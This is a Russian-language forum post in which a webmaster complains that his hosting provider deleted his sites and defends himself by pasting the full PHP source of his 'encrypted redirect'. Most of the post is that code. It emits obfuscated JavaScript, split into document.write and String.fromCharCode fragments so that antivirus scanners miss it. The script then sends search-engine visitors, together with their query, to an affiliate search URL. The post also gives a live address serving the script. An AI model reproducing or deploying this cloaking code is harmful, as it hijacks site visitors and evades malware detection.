сначала думал что noable удалил мой акк за не давный инцидент(взломали фтп и повесили ифрейм) но оказывается он просто удалил за шифрованный редирект.
Короче, публично прошу извинению у noable за мои неадекватные оскорбление. Но в этом случая он был не прав. я потерял траф, время. надо было просто заблокировать акк и поговорить со мной.
блин noable, ну ты даешь . я просто ох..ел, когда узнал что ты удалил мои сайты просто за шифрованный редирект на ппс, вот здесь исходник редиректа
<?php function gname($length=6) { $chars = "abcdefghijklmnopqrstuwxyz"; $code = ""; $clen = strlen($chars) - 1; while (strlen($code) < $length) { $code .= $chars[mt_rand(0,$clen)]; } return $code; } $rr=gname(); $chars='"()<>+ .:/-_?&=+QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789;!,{}|'.chr(92).'[]'; $ar[0]=34; $ar[1]=40; $ar[2]=41; $ar[3]=60; $ar[4]=62; $ar[5]=43; $ar[6]=32; $ar[7]=46; $ar[8]=58; $ar[9]=47; $ar[10]=45; $ar[11]=95; $ar[12]=63; $ar[13]=38; $ar[14]=61; $ar[15]=43; $ar[16]=81; $ar[17]=87; $ar[18]=69; $ar[19]=82; $ar[20]=84; $ar[21]=89; $ar[22]=85; $ar[23]=73; $ar[24]=79; $ar[25]=80; $ar[26]=65; $ar[27]=83; $ar[28]=68; $ar[29]=70; $ar[30]=71; $ar[31]=72; $ar[32]=74; $ar[33]=75; $ar[34]=76; $ar[35]=90; $ar[36]=88; $ar[37]=67; $ar[38]=86; $ar[39]=66; $ar[40]=78; $ar[41]=77; $ar[42]=113; $ar[43]=119; $ar[44]=101; $ar[45]=114; $ar[46]=116; $ar[47]=121; $ar[48]=117; $ar[49]=105; $ar[50]=111; $ar[51]=112; $ar[52]=97; $ar[53]=115; $ar[54]=100; $ar[55]=102; $ar[56]=103; $ar[57]=104; $ar[58]=106; $ar[59]=107; $ar[60]=108; $ar[61]=122; $ar[62]=120; $ar[63]=99; $ar[64]=118; $ar[65]=98; $ar[66]=110; $ar[67]=109; $ar[68]=48; $ar[69]=49; $ar[70]=50; $ar[71]=51; $ar[72]=52; $ar[73]=53; $ar[74]=54; $ar[75]=55; $ar[76]=56; $ar[77]=57; $ar[78]=59; $ar[79]=33; $ar[80]=44; $ar[81]=123; $ar[82]=125; $ar[83]=124; $ar[84]=92; $ar[85]=91; $ar[86]=93; $codekey=$_GET['codekey']; $redir_url='http://www.youfindmore.com/?aid=531&subid=&q='; $s[0]='<script>'; $s[1]='var '.$rr.'=document.referrer,u=document.URL,t="",q,pp,se="gb",surov=document.title;codesym="'.$codekey.'";'; $s[2]='pp=surov.indexOf(codesym);surov=surov.substring(pp+codesym.length,surov.length);'; $s[3]='if('.$rr.'.indexOf("google.")!=-1){t="q";se="google";}'; $s[4]='if('.$rr.'.indexOf("msn.")!=-1){t="q";se="msn";}'; $s[5]='if('.$rr.'.indexOf("yahoo.")!=-1){t="p";se="yahoo";}'; $s[6]='if(t.length&&((q='.$rr.'.indexOf("?"+t+"="))!=-1||(q='.$rr.'.indexOf("&"+t+"="))!=-1))'; $s[7]='{surov=unescape('.$rr.'.substring(q+2+t.length).split("&")[0]);}'; $s[8]='document.write("<scr"+"ipt>");'; $s[9]='document.write("window.location="+String.fromCharCode(34)+"'.$redir_url.'"+surov+String.fromCharCode(34))'; $s[10]='document.write("</scr"+"ipt>");'; $s[11]='</script>'; for ($i=0;$i<12;$i++) { $len=strlen($s[$i]); $k=0; while($k<$len) { $n=rand(0,$len-$k); $op=rand(0,1); $ss=''; for ($p=0;$p<$n;$p++) { if ($op==0) { $ss.=substr($s[$i],$k,1); } else { $ss=$ss.$ar[strpos($chars,substr($s[$i],$k,1))].','; } $k++; } if ($op==0) { echo "document.write('".$ss."')"."\n"; } else { echo 'outs=String.fromCharCode('.substr($ss,0,strlen($ss)-1).')'."\n"; echo 'document.write(outs)'."\n"; } } echo 'document.writeln()'."\n"; } ?>
поднял сайт с скриптом, можешь проверять хttp://danlook.info/nnb/riva.php?codekey=:
действительно антивирус ругает, что там вирус. но там было просто зашифрованный редирект.
